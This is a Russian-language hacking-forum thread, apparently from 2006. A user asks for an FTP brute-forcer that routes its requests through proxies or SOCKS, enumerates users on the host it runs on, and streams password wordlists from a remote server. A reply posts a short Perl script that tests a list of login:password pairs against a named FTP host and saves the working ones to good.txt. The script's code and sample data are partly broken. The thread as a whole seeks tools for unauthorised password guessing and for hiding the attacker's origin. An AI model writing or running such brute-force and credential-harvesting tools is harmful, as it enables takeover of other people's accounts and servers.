геном помоги написать брутер для ФТП ... такой же как для мыла у тебя... единственное что у меня не получаеться так это что бы все запросы ходили через прокси сервер... ну Или соксы ....
ну и что бы рутинная работа выполнялась сама . такие как составления списка пользователей сервера на катором запускаеться скрипт.. ну если будет желание то моЖно попроБывать пассы считывать с удаленного сервера .. или что бы они сами грузили в процессе запуска. там первый прошел грузим второй ... загрузили второй начали Брут ... проБрутил ...удалил, грзуим другой и так пока не кончиться ... удобный инструмент получиться .... я думаю тебе по плечу такие ззадачи ... если не сможешь или не захочешь тогда отпиШись я не обиЖусь...
Последний раз редактировалось 0xff; 25.11.2006 в 21:33..
чекер ftp -- frb хранятся в файле в виде
1:login1ass1
2:loginass2
код -->
#!usr/bin/perl
use Net::FTP;
$ftp = Net::FTP->new("genom.h10.ru", );
open file,'<ftp.txt'; # файл в котром хранятся твои акаунты к ftp
open goodd,'>good.txt';
while($lol=<file>)
{
$lol=~s/\n//;
($cifra,$llogin,$pass)=split(/:/,$lol); # разбираем
$ftp -> login($llogin,$pass) or goto(dava);
print goodd "$lol\n";
dava:
}
да лано тогда...раз некогда и время тратить не хотите ... тогда вопрос другой ... помогите разобраться хатябы с проксеГом ... непойму как мне эти все запросы через прокси транслировать ... непойму .. помоГите ...примерный код как и что долЖно ыбть можете поДкинуть... ?
можно и с соксами забабхать ...
но и с проксей тож интересно будет посатреть.
счас сяду кодить . незнаю что получиться но думаю должно получиться вродь руки растут от туда же откуда и у всех !